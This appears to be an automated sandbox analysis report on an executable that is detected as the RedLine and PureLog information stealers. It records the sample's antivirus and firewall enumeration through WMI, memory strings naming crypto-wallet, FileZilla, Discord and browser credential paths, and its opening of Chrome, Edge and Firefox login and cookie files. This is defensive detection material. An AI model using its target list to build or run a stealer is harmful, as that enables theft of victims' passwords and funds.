Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.340e790.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.4fa0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $kq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumL"
Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $kq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: MfzXU6tKOq.exe, 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

